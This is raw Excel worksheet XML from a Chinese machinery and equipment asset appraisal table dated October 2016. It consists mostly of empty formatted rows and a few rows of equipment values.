    <row r="12258" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12258" s="26"/>
      <c r="B12258" s="26"/>
      <c r="C12258" s="26"/>
      <c r="D12258" s="63"/>
      <c r="E12258" s="63"/>
      <c r="F12258" s="26"/>
      <c r="G12258" s="28"/>
      <c r="H12258" s="26"/>
      <c r="I12258" s="26"/>
      <c r="J12258" s="64"/>
      <c r="K12258" s="30"/>
      <c r="L12258" s="26"/>
      <c r="M12258" s="26"/>
    </row>
    <row r="12259" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12259" s="26"/>
      <c r="B12259" s="26"/>
      <c r="C12259" s="26"/>
      <c r="D12259" s="63"/>
      <c r="E12259" s="63"/>
      <c r="F12259" s="26"/>
      <c r="G12259" s="28"/>
      <c r="H12259" s="26"/>
      <c r="I12259" s="26"/>
      <c r="J12259" s="64"/>
      <c r="K12259" s="30"/>
      <c r="L12259" s="26"/>
      <c r="M12259" s="26"/>
    </row>
    <row r="12260" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12260" s="26"/>
      <c r="B12260" s="26"/>
      <c r="C12260" s="26"/>
      <c r="D12260" s="63"/>
      <c r="E12260" s="63"/>
      <c r="F12260" s="26"/>
      <c r="G12260" s="28"/>
      <c r="H12260" s="26"/>
      <c r="I12260" s="26"/>
      <c r="J12260" s="64"/>
      <c r="K12260" s="30"/>
      <c r="L12260" s="26"/>
      <c r="M12260" s="26"/>
    </row>
    <row r="12261" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12261" s="26"/>
      <c r="B12261" s="26"/>
      <c r="C12261" s="26"/>
      <c r="D12261" s="63"/>
      <c r="E12261" s="63"/>
      <c r="F12261" s="26"/>
      <c r="G12261" s="28"/>
      <c r="H12261" s="26"/>
      <c r="I12261" s="26"/>
      <c r="J12261" s="64"/>
      <c r="K12261" s="30"/>
      <c r="L12261" s="26"/>
      <c r="M12261" s="26"/>
    </row>
    <row r="12262" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12262" s="26"/>
      <c r="B12262" s="26"/>
      <c r="C12262" s="26"/>
      <c r="D12262" s="63"/>
      <c r="E12262" s="63"/>
      <c r="F12262" s="26"/>
      <c r="G12262" s="28"/>
      <c r="H12262" s="26"/>
      <c r="I12262" s="26"/>
      <c r="J12262" s="64"/>
      <c r="K12262" s="30"/>
      <c r="L12262" s="26"/>
      <c r="M12262" s="26"/>
    </row>
    <row r="12263" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12263" s="26"/>
      <c r="B12263" s="26"/>
      <c r="C12263" s="26"/>
      <c r="D12263" s="63"/>
      <c r="E12263" s="63"/>
      <c r="F12263" s="26"/>
      <c r="G12263" s="28"/>
      <c r="H12263" s="26"/>
      <c r="I12263" s="26"/>
      <c r="J12263" s="64"/>
      <c r="K12263" s="30"/>
      <c r="L12263" s="26"/>
      <c r="M12263" s="26"/>
    </row>
    <row r="12264" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12264" s="26"/>
      <c r="B12264" s="26"/>
      <c r="C12264" s="26"/>
      <c r="D12264" s="63"/>
      <c r="E12264" s="63"/>
      <c r="F12264" s="26"/>
      <c r="G12264" s="28"/>
      <c r="H12264" s="26"/>
      <c r="I12264" s="26"/>
      <c r="J12264" s="64"/>
      <c r="K12264" s="30"/>
      <c r="L12264" s="26"/>
      <c r="M12264" s="26"/>
    </row>
    <row r="12265" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12265" s="26"/>
      <c r="B12265" s="26"/>
      <c r="C12265" s="26"/>
      <c r="D12265" s="63"/>
      <c r="E12265" s="63"/>
      <c r="F12265" s="26"/>
      <c r="G12265" s="28"/>
      <c r="H12265" s="26"/>
      <c r="I12265" s="26"/>
      <c r="J12265" s="64"/>
      <c r="K12265" s="30"/>
      <c r="L12265" s="26"/>
      <c r="M12265" s="26"/>
    </row>
    <row r="12266" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12266" s="26"/>
      <c r="B12266" s="26"/>
      <c r="C12266" s="26"/>
      <c r="D12266" s="63"/>
      <c r="E12266" s="63"/>
      <c r="F12266" s="26"/>
      <c r="G12266" s="28"/>
      <c r="H12266" s="26"/>
      <c r="I12266" s="26"/>
      <c r="J12266" s="64"/>
      <c r="K12266" s="30"/>
      <c r="L12266" s="26"/>
      <c r="M12266" s="26"/>
    </row>
    <row r="12267" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12267" s="26"/>
      <c r="B12267" s="26"/>
      <c r="C12267" s="26"/>
      <c r="D12267" s="63"/>
      <c r="E12267" s="63"/>
      <c r="F12267" s="26"/>
      <c r="G12267" s="28"/>
      <c r="H12267" s="26"/>
      <c r="I12267" s="26"/>
      <c r="J12267" s="64"/>
      <c r="K12267" s="30"/>
      <c r="L12267" s="26"/>
      <c r="M12267" s="26"/>
    </row>
    <row r="12268" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12268" s="26"/>
      <c r="B12268" s="26"/>
      <c r="C12268" s="26"/>
      <c r="D12268" s="63"/>
      <c r="E12268" s="63"/>
      <c r="F12268" s="26"/>
      <c r="G12268" s="28"/>
      <c r="H12268" s="26"/>
      <c r="I12268" s="26"/>
      <c r="J12268" s="64"/>
      <c r="K12268" s="30"/>
      <c r="L12268" s="26"/>
      <c r="M12268" s="26"/>
    </row>
    <row r="12269" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12269" s="26"/>
      <c r="B12269" s="26"/>
      <c r="C12269" s="26"/>
      <c r="D12269" s="63"/>
      <c r="E12269" s="63"/>
      <c r="F12269" s="26"/>
      <c r="G12269" s="28"/>
      <c r="H12269" s="26"/>
      <c r="I12269" s="26"/>
      <c r="J12269" s="64"/>
      <c r="K12269" s="30"/>
      <c r="L12269" s="26"/>
      <c r="M12269" s="26"/>
    </row>
    <row r="12270" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12270" s="26"/>
      <c r="B12270" s="26"/>
      <c r="C12270" s="26"/>
      <c r="D12270" s="63"/>
      <c r="E12270" s="63"/>
      <c r="F12270" s="26"/>
      <c r="G12270" s="28"/>
      <c r="H12270" s="26"/>
      <c r="I12270" s="26"/>
      <c r="J12270" s="64"/>
      <c r="K12270" s="30"/>
      <c r="L12270" s="26"/>
      <c r="M12270" s="26"/>
    </row>
    <row r="12271" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12271" s="26"/>
      <c r="B12271" s="26"/>
      <c r="C12271" s="26"/>
      <c r="D12271" s="63"/>
      <c r="E12271" s="63"/>
      <c r="F12271" s="26"/>
      <c r="G12271" s="28"/>
      <c r="H12271" s="26"/>
      <c r="I12271" s="26"/>
      <c r="J12271" s="64"/>
      <c r="K12271" s="30"/>
      <c r="L12271" s="26"/>
      <c r="M12271" s="26"/>
    </row>
    <row r="12272" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12272" s="26"/>
      <c r="B12272" s="26"/>
      <c r="C12272" s="26"/>
      <c r="D12272" s="63"/>
      <c r="E12272" s="63"/>
      <c r="F12272" s="26"/>
      <c r="G12272" s="28"/>
      <c r="H12272" s="26"/>
      <c r="I12272" s="26"/>
      <c r="J12272" s="64"/>
      <c r="K12272" s="30"/>
      <c r="L12272" s="26"/>
      <c r="M12272" s="26"/>
    </row>
    <row r="12273" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12273" s="26"/>
      <c r="B12273" s="26"/>
      <c r="C12273" s="26"/>
      <c r="D12273" s="63"/>
      <c r="E12273" s="63"/>
      <c r="F12273" s="26"/>
      <c r="G12273" s="28"/>
      <c r="H12273" s="26"/>
      <c r="I12273" s="26"/>
      <c r="J12273" s="64"/>
      <c r="K12273" s="30"/>
      <c r="L12273" s="26"/>
      <c r="M12273" s="26"/>
    </row>
    <row r="12274" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12274" s="26"/>
      <c r="B12274" s="26"/>
      <c r="C12274" s="26"/>
      <c r="D12274" s="63"/>
      <c r="E12274" s="63"/>
      <c r="F12274" s="26"/>
      <c r="G12274" s="28"/>
      <c r="H12274" s="26"/>
      <c r="I12274" s="26"/>
      <c r="J12274" s="64"/>
      <c r="K12274" s="30"/>
      <c r="L12274" s="26"/>
      <c r="M12274" s="26"/>
    </row>
    <row r="12275" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12275" s="26"/>
      <c r="B12275" s="26"/>
      <c r="C12275" s="26"/>
      <c r="D12275" s="63"/>
      <c r="E12275" s="63"/>
      <c r="F12275" s="26"/>
      <c r="G12275" s="28"/>
      <c r="H12275" s="26"/>
      <c r="I12275" s="26"/>
      <c r="J12275" s="64"/>
      <c r="K12275" s="30"/>
      <c r="L12275" s="26"/>
      <c r="M12275" s="26"/>
    </row>
    <row r="12276" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12276" s="26"/>
      <c r="B12276" s="26"/>
      <c r="C12276" s="26"/>
      <c r="D12276" s="63"/>
      <c r="E12276" s="63"/>
      <c r="F12276" s="26"/>
      <c r="G12276" s="28"/>
      <c r="H12276" s="26"/>
      <c r="I12276" s="26"/>
      <c r="J12276" s="64"/>
      <c r="K12276" s="30"/>
      <c r="L12276" s="26"/>
      <c r="M12276" s="26"/>
    </row>
    <row r="12277" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12277" s="26"/>
      <c r="B12277" s="26"/>
      <c r="C12277" s="26"/>
      <c r="D12277" s="63"/>
      <c r="E12277" s="63"/>
      <c r="F12277" s="26"/>
      <c r="G12277" s="28"/>
      <c r="H12277" s="26"/>
      <c r="I12277" s="26"/>
      <c r="J12277" s="64"/>
      <c r="K12277" s="30"/>
      <c r="L12277" s="26"/>
      <c r="M12277" s="26"/>
    </row>
    <row r="12278" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12278" s="26"/>
      <c r="B12278" s="26"/>
      <c r="C12278" s="26"/>
      <c r="D12278" s="63"/>
      <c r="E12278" s="63"/>
      <c r="F12278" s="26"/>
      <c r="G12278" s="28"/>
      <c r="H12278" s="26"/>
      <c r="I12278" s="26"/>
      <c r="J12278" s="64"/>
      <c r="K12278" s="30"/>
      <c r="L12278" s="26"/>
      <c r="M12278" s="26"/>
    </row>
    <row r="12279" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12279" s="26"/>
      <c r="B12279" s="26"/>
      <c r="C12279" s="26"/>
      <c r="D12279" s="63"/>
      <c r="E12279" s="63"/>
      <c r="F12279" s="26"/>
      <c r="G12279" s="28"/>
      <c r="H12279" s="26"/>
      <c r="I12279" s="26"/>
      <c r="J12279" s="64"/>
      <c r="K12279" s="30"/>
      <c r="L12279" s="26"/>
      <c r="M12279" s="26"/>
    </row>
    <row r="12280" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12280" s="26"/>
      <c r="B12280" s="26"/>
      <c r="C12280" s="26"/>
      <c r="D12280" s="63"/>
      <c r="E12280" s="63"/>
      <c r="F12280" s="26"/>
      <c r="G12280" s="28"/>
      <c r="H12280" s="26"/>
      <c r="I12280" s="26"/>
      <c r="J12280" s="64"/>
      <c r="K12280" s="30"/>
      <c r="L12280" s="26"/>
      <c r="M12280" s="26"/>
    </row>
    <row r="12281" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12281" s="26"/>
      <c r="B12281" s="26"/>
      <c r="C12281" s="26"/>
      <c r="D12281" s="63"/>
      <c r="E12281" s="63"/>
      <c r="F12281" s="26"/>
      <c r="G12281" s="28"/>
      <c r="H12281" s="26"/>
      <c r="I12281" s="26"/>
      <c r="J12281" s="64"/>
      <c r="K12281" s="30"/>
      <c r="L12281" s="26"/>
      <c r="M12281" s="26"/>
    </row>
    <row r="12282" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12282" s="26"/>
      <c r="B12282" s="26"/>
      <c r="C12282" s="26"/>
      <c r="D12282" s="63"/>
      <c r="E12282" s="63"/>
      <c r="F12282" s="26"/>
      <c r="G12282" s="28"/>
      <c r="H12282" s="26"/>
      <c r="I12282" s="26"/>
      <c r="J12282" s="64"/>
      <c r="K12282" s="30"/>
      <c r="L12282" s="26"/>
      <c r="M12282" s="26"/>
    </row>
    <row r="12283" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12283" s="26"/>
      <c r="B12283" s="26"/>
      <c r="C12283" s="26"/>
      <c r="D12283" s="63"/>
      <c r="E12283" s="63"/>
      <c r="F12283" s="26"/>
      <c r="G12283" s="28"/>
      <c r="H12283" s="26"/>
      <c r="I12283" s="26"/>
      <c r="J12283" s="64"/>
      <c r="K12283" s="30"/>
      <c r="L12283" s="26"/>
      <c r="M12283" s="26"/>
    </row>
    <row r="12284" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12284" s="26"/>
      <c r="B12284" s="26"/>
      <c r="C12284" s="26"/>
      <c r="D12284" s="63"/>
      <c r="E12284" s="63"/>
      <c r="F12284" s="26"/>
      <c r="G12284" s="28"/>
      <c r="H12284" s="26"/>
      <c r="I12284" s="26"/>
      <c r="J12284" s="64"/>
      <c r="K12284" s="30"/>
      <c r="L12284" s="26"/>
      <c r="M12284" s="26"/>
    </row>
    <row r="12285" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12285" s="26"/>
      <c r="B12285" s="26"/>
      <c r="C12285" s="26"/>
      <c r="D12285" s="63"/>
      <c r="E12285" s="63"/>
      <c r="F12285" s="26"/>
      <c r="G12285" s="28"/>
      <c r="H12285" s="26"/>
      <c r="I12285" s="26"/>
      <c r="J12285" s="64"/>
      <c r="K12285" s="30"/>
      <c r="L12285" s="26"/>
      <c r="M12285" s="26"/>
    </row>
    <row r="12286" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12286" s="26"/>
      <c r="B12286" s="26"/>
      <c r="C12286" s="26"/>
      <c r="D12286" s="63"/>
      <c r="E12286" s="63"/>
      <c r="F12286" s="26"/>
      <c r="G12286" s="28"/>
      <c r="H12286" s="26"/>
      <c r="I12286" s="26"/>
      <c r="J12286" s="64"/>
      <c r="K12286" s="30"/>
      <c r="L12286" s="26"/>
      <c r="M12286" s="26"/>
    </row>
    <row r="12287" s="25" customFormat="1" customHeight="1" spans="1:13">
      <c r="A12287" s="26"/>
      <c r="B12287" s="26"/>
      <c r="C12287" s="26"/>
      <c r="D12287" s="63"/>
      <c r="E12287" s="63"/>
      <c r="F12287" s="26"/>
      <c r="G12287" s="28"/>
      <c r="H12287" s="26"/>
      <c r="I12287" s="26"/>
      <c r="J12287" s="64"/>
      <c r="K12287" s="30"/>
      <c r="L12287" s="26"/>
      <c r="M12287" s="26"/>
    </row>
  </sheetData>
  <mergeCells count="27">
    <mergeCell ref="B1:K1"/>
    <mergeCell ref="B3:C3"/>
    <mergeCell ref="D3:L3"/>
    <mergeCell ref="B133:E133"/>
    <mergeCell ref="B147:E147"/>
    <mergeCell ref="B158:E158"/>
    <mergeCell ref="B179:E179"/>
    <mergeCell ref="B188:E188"/>
    <mergeCell ref="B200:E200"/>
    <mergeCell ref="B216:E216"/>
    <mergeCell ref="B224:E224"/>
    <mergeCell ref="B235:E235"/>
    <mergeCell ref="B239:E239"/>
    <mergeCell ref="B244:E244"/>
    <mergeCell ref="B270:E270"/>
    <mergeCell ref="B272:E272"/>
    <mergeCell ref="B292:D292"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="E5:E6"/>
    <mergeCell ref="F5:F6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="J5:J6"/>
    <mergeCell ref="K5:K6"/>
  </mergeCells>
  <pageMargins left="0.719444444444444" right="0.579861111111111" top="1.82986111111111" bottom="0.679861111111111" header="0.929861111111111" footer="0.379861111111111"/>
  <pageSetup paperSize="9" scale="75" orientation="landscape" horizontalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="0">
    <oddHeader>&amp;L&amp;10
被评估单位（或者产权持有单位）：晋煤冀州银海化肥有限责任公司&amp;C&amp;"黑体,常规"&amp;18固定资产—机器设备评估明细表&amp;"宋体,常规"&amp;12
&amp;10评估基准日：2016年10月31日&amp;R&amp;10
表4-6-4
金额单位：人民币元</oddHeader>
    <oddFooter>&amp;L&amp;10评估单位:衡水正财资产评估有限公司&amp;C&amp;10评估人员：于红兵 郑国建 吴洁 贾佳 王文祥 程艳菊</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H11872"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="J7" sqref="J7:J16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.5" defaultRowHeight="24" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="14.5" style="26"/>
    <col min="2" max="2" width="4.75" style="26" customWidth="1"/>
    <col min="3" max="3" width="7.875" style="26" customWidth="1"/>
    <col min="4" max="4" width="18.75" style="27" customWidth="1"/>
    <col min="5" max="5" width="13.75" style="27" customWidth="1"/>
    <col min="6" max="6" width="5.625" style="26" customWidth="1"/>
    <col min="7" max="7" width="5.875" style="28" customWidth="1"/>
    <col min="8" max="8" width="10.625" style="26" customWidth="1"/>
    <col min="9" max="9" width="14.125" style="26" customWidth="1"/>
    <col min="10" max="10" width="13.625" style="29" customWidth="1"/>
    <col min="11" max="11" width="14.75" style="30" customWidth="1"/>
    <col min="12" max="13" width="14.75" style="26" customWidth="1"/>
    <col min="14" max="16384" width="14.5" style="26"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="1:14">
      <c r="A1" s="25"/>
      <c r="B1" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
      <c r="L1" s="1"/>
      <c r="M1" s="25"/>
      <c r="N1" s="25"/>
    </row>
    <row r="2" customHeight="1" spans="1:14">
      <c r="A2" s="25"/>
      <c r="B2" s="1"/>
      <c r="C2" s="2"/>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="2"/>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
      <c r="M2" s="25"/>
      <c r="N2" s="25"/>
    </row>
    <row r="3" customHeight="1" spans="1:14">
      <c r="A3" s="25"/>
      <c r="B3" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="5" t="s">
        <v>1361</v>
      </c>
      <c r="E3" s="5"/>
      <c r="F3" s="5"/>
      <c r="G3" s="5"/>
      <c r="H3" s="5"/>
      <c r="I3" s="5"/>
      <c r="J3" s="5"/>
      <c r="K3" s="5"/>
      <c r="L3" s="5"/>
      <c r="M3" s="25"/>
      <c r="N3" s="25"/>
    </row>
    <row r="4" customHeight="1" spans="1:14">
      <c r="A4" s="25"/>
      <c r="B4" s="25"/>
      <c r="C4" s="25"/>
      <c r="D4" s="25"/>
      <c r="E4" s="25"/>
      <c r="F4" s="25"/>
      <c r="G4" s="25"/>
      <c r="H4" s="25"/>
      <c r="I4" s="25"/>
      <c r="J4" s="25"/>
      <c r="K4" s="25"/>
      <c r="L4" s="25"/>
      <c r="M4" s="25"/>
      <c r="N4" s="25"/>
    </row>
    <row r="5" s="23" customFormat="1" customHeight="1" spans="1:34">
      <c r="A5" s="25"/>
      <c r="B5" s="31" t="s">
        <v>209</v>
      </c>
      <c r="C5" s="31" t="s">
        <v>2722</v>
      </c>
      <c r="D5" s="32" t="s">
        <v>211</v>
      </c>
      <c r="E5" s="32" t="s">
        <v>212</v>
      </c>
      <c r="F5" s="31" t="s">
        <v>214</v>
      </c>
      <c r="G5" s="33" t="s">
        <v>215</v>
      </c>
      <c r="H5" s="31" t="s">
        <v>216</v>
      </c>
      <c r="I5" s="46" t="s">
        <v>217</v>
      </c>
      <c r="J5" s="46" t="s">
        <v>218</v>
      </c>
      <c r="K5" s="31" t="s">
        <v>219</v>
      </c>
      <c r="L5" s="25"/>
      <c r="M5" s="47"/>
      <c r="N5" s="47"/>
      <c r="O5" s="47"/>
      <c r="P5" s="47"/>
      <c r="Q5" s="47"/>
      <c r="R5" s="47"/>
      <c r="S5" s="47"/>
      <c r="T5" s="47"/>
      <c r="U5" s="47"/>
      <c r="V5" s="47"/>
      <c r="W5" s="47"/>
      <c r="X5" s="47"/>
      <c r="Y5" s="47"/>
      <c r="Z5" s="47"/>
      <c r="AA5" s="47"/>
      <c r="AB5" s="47"/>
      <c r="AC5" s="47"/>
      <c r="AD5" s="47"/>
      <c r="AE5" s="47"/>
      <c r="AF5" s="47"/>
      <c r="AG5" s="47"/>
      <c r="AH5" s="47"/>
    </row>
    <row r="6" s="23" customFormat="1" customHeight="1" spans="1:34">
      <c r="A6" s="25"/>
      <c r="B6" s="31"/>
      <c r="C6" s="31"/>
      <c r="D6" s="32"/>
      <c r="E6" s="32"/>
      <c r="F6" s="31"/>
      <c r="G6" s="33"/>
      <c r="H6" s="31"/>
      <c r="I6" s="48"/>
      <c r="J6" s="48"/>
      <c r="K6" s="31"/>
      <c r="L6" s="25"/>
      <c r="M6" s="47"/>
      <c r="N6" s="47"/>
      <c r="O6" s="47"/>
      <c r="P6" s="47"/>
      <c r="Q6" s="47"/>
      <c r="R6" s="47"/>
      <c r="S6" s="47"/>
      <c r="T6" s="47"/>
      <c r="U6" s="47"/>
      <c r="V6" s="47"/>
      <c r="W6" s="47"/>
      <c r="X6" s="47"/>
      <c r="Y6" s="47"/>
      <c r="Z6" s="47"/>
      <c r="AA6" s="47"/>
      <c r="AB6" s="47"/>
      <c r="AC6" s="47"/>
      <c r="AD6" s="47"/>
      <c r="AE6" s="47"/>
      <c r="AF6" s="47"/>
      <c r="AG6" s="47"/>
      <c r="AH6" s="47"/>
    </row>
    <row r="7" s="23" customFormat="1" customHeight="1" spans="1:34">
      <c r="A7" s="25"/>
      <c r="B7" s="23">
        <v>3</v>
      </c>
      <c r="C7" s="260" t="s">
        <v>4640</v>
      </c>
      <c r="D7" s="261" t="s">
        <v>4641</v>
      </c>
      <c r="E7" s="260" t="s">
        <v>4642</v>
      </c>
      <c r="F7" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G7" s="34">
        <v>2</v>
      </c>
      <c r="H7" s="260" t="s">
        <v>273</v>
      </c>
      <c r="I7" s="49">
        <v>36000</v>
      </c>
      <c r="J7" s="50">
        <v>5760</v>
      </c>
      <c r="K7" s="261" t="s">
        <v>4643</v>
      </c>
      <c r="L7" s="25"/>
      <c r="M7" s="51"/>
      <c r="N7" s="47"/>
      <c r="O7" s="47"/>
      <c r="P7" s="47"/>
      <c r="Q7" s="47"/>
      <c r="R7" s="47"/>
      <c r="S7" s="47"/>
      <c r="T7" s="47"/>
      <c r="U7" s="47"/>
      <c r="V7" s="47"/>
      <c r="W7" s="47"/>
      <c r="X7" s="47"/>
      <c r="Y7" s="47"/>
      <c r="Z7" s="47"/>
      <c r="AA7" s="47"/>
      <c r="AB7" s="47"/>
      <c r="AC7" s="47"/>
      <c r="AD7" s="47"/>
      <c r="AE7" s="47"/>
      <c r="AF7" s="47"/>
      <c r="AG7" s="47"/>
      <c r="AH7" s="47"/>
    </row>
    <row r="8" s="23" customFormat="1" customHeight="1" spans="1:34">
      <c r="A8" s="25"/>
      <c r="B8" s="23">
        <v>4</v>
      </c>
      <c r="C8" s="260" t="s">
        <v>4644</v>
      </c>
      <c r="D8" s="261" t="s">
        <v>4645</v>
      </c>
      <c r="E8" s="260" t="s">
        <v>4646</v>
      </c>
      <c r="F8" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G8" s="34">
        <v>1</v>
      </c>
      <c r="H8" s="260" t="s">
        <v>273</v>
      </c>
      <c r="I8" s="49">
        <v>21800</v>
      </c>
      <c r="J8" s="50">
        <v>3456</v>
      </c>
      <c r="K8" s="261" t="s">
        <v>4647</v>
      </c>
      <c r="L8" s="25"/>
      <c r="M8" s="51"/>
      <c r="N8" s="47"/>
      <c r="O8" s="47"/>
      <c r="P8" s="47"/>
      <c r="Q8" s="47"/>
      <c r="R8" s="47"/>
      <c r="S8" s="47"/>
      <c r="T8" s="47"/>
      <c r="U8" s="47"/>
      <c r="V8" s="47"/>
      <c r="W8" s="47"/>
      <c r="X8" s="47"/>
      <c r="Y8" s="47"/>
      <c r="Z8" s="47"/>
      <c r="AA8" s="47"/>
      <c r="AB8" s="47"/>
      <c r="AC8" s="47"/>
      <c r="AD8" s="47"/>
      <c r="AE8" s="47"/>
      <c r="AF8" s="47"/>
      <c r="AG8" s="47"/>
      <c r="AH8" s="47"/>
    </row>
    <row r="9" s="23" customFormat="1" customHeight="1" spans="1:34">
      <c r="A9" s="25"/>
      <c r="B9" s="23">
        <v>5</v>
      </c>
      <c r="C9" s="260" t="s">
        <v>4648</v>
      </c>
      <c r="D9" s="261" t="s">
        <v>4166</v>
      </c>
      <c r="E9" s="34"/>
      <c r="F9" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G9" s="34">
        <v>1</v>
      </c>
      <c r="H9" s="260" t="s">
        <v>1735</v>
      </c>
      <c r="I9" s="49">
        <v>2200</v>
      </c>
      <c r="J9" s="50">
        <v>352</v>
      </c>
      <c r="K9" s="261" t="s">
        <v>4643</v>
      </c>
      <c r="L9" s="25"/>
      <c r="M9" s="51"/>
      <c r="N9" s="47"/>
      <c r="O9" s="47"/>
      <c r="P9" s="47"/>
      <c r="Q9" s="47"/>
      <c r="R9" s="47"/>
      <c r="S9" s="47"/>
      <c r="T9" s="47"/>
      <c r="U9" s="47"/>
      <c r="V9" s="47"/>
      <c r="W9" s="47"/>
      <c r="X9" s="47"/>
      <c r="Y9" s="47"/>
      <c r="Z9" s="47"/>
      <c r="AA9" s="47"/>
      <c r="AB9" s="47"/>
      <c r="AC9" s="47"/>
      <c r="AD9" s="47"/>
      <c r="AE9" s="47"/>
      <c r="AF9" s="47"/>
      <c r="AG9" s="47"/>
      <c r="AH9" s="47"/>
    </row>
    <row r="10" s="23" customFormat="1" customHeight="1" spans="1:34">
      <c r="A10" s="25"/>
      <c r="B10" s="23">
        <v>6</v>
      </c>
      <c r="C10" s="260" t="s">
        <v>4649</v>
      </c>
      <c r="D10" s="261" t="s">
        <v>4650</v>
      </c>
      <c r="E10" s="260" t="s">
        <v>4651</v>
      </c>
      <c r="F10" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G10" s="34">
        <v>2</v>
      </c>
      <c r="H10" s="260" t="s">
        <v>4652</v>
      </c>
      <c r="I10" s="49">
        <v>10000</v>
      </c>
      <c r="J10" s="50">
        <v>2080</v>
      </c>
      <c r="K10" s="261" t="s">
        <v>4643</v>
      </c>
      <c r="L10" s="25"/>
      <c r="M10" s="51"/>
      <c r="N10" s="47"/>
      <c r="O10" s="47"/>
      <c r="P10" s="47"/>
      <c r="Q10" s="47"/>
      <c r="R10" s="47"/>
      <c r="S10" s="47"/>
      <c r="T10" s="47"/>
      <c r="U10" s="47"/>
      <c r="V10" s="47"/>
      <c r="W10" s="47"/>
      <c r="X10" s="47"/>
      <c r="Y10" s="47"/>
      <c r="Z10" s="47"/>
      <c r="AA10" s="47"/>
      <c r="AB10" s="47"/>
      <c r="AC10" s="47"/>
      <c r="AD10" s="47"/>
      <c r="AE10" s="47"/>
      <c r="AF10" s="47"/>
      <c r="AG10" s="47"/>
      <c r="AH10" s="47"/>
    </row>
    <row r="11" s="23" customFormat="1" customHeight="1" spans="1:34">
      <c r="A11" s="25"/>
      <c r="B11" s="23">
        <v>7</v>
      </c>
      <c r="C11" s="260" t="s">
        <v>4653</v>
      </c>
      <c r="D11" s="261" t="s">
        <v>4654</v>
      </c>
      <c r="E11" s="260" t="s">
        <v>4655</v>
      </c>
      <c r="F11" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G11" s="34">
        <v>1</v>
      </c>
      <c r="H11" s="260" t="s">
        <v>4656</v>
      </c>
      <c r="I11" s="49">
        <v>26000</v>
      </c>
      <c r="J11" s="50">
        <v>6240</v>
      </c>
      <c r="K11" s="261" t="s">
        <v>4657</v>
      </c>
      <c r="L11" s="25"/>
      <c r="M11" s="51"/>
      <c r="N11" s="47"/>
      <c r="O11" s="47"/>
      <c r="P11" s="47"/>
      <c r="Q11" s="47"/>
      <c r="R11" s="47"/>
      <c r="S11" s="47"/>
      <c r="T11" s="47"/>
      <c r="U11" s="47"/>
      <c r="V11" s="47"/>
      <c r="W11" s="47"/>
      <c r="X11" s="47"/>
      <c r="Y11" s="47"/>
      <c r="Z11" s="47"/>
      <c r="AA11" s="47"/>
      <c r="AB11" s="47"/>
      <c r="AC11" s="47"/>
      <c r="AD11" s="47"/>
      <c r="AE11" s="47"/>
      <c r="AF11" s="47"/>
      <c r="AG11" s="47"/>
      <c r="AH11" s="47"/>
    </row>
    <row r="12" s="23" customFormat="1" customHeight="1" spans="1:34">
      <c r="A12" s="25"/>
      <c r="B12" s="23">
        <v>9</v>
      </c>
      <c r="C12" s="260" t="s">
        <v>4658</v>
      </c>
      <c r="D12" s="261" t="s">
        <v>4659</v>
      </c>
      <c r="E12" s="260" t="s">
        <v>4660</v>
      </c>
      <c r="F12" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G12" s="34">
        <v>1</v>
      </c>
      <c r="H12" s="260" t="s">
        <v>3363</v>
      </c>
      <c r="I12" s="49">
        <v>46000</v>
      </c>
      <c r="J12" s="50">
        <v>12880</v>
      </c>
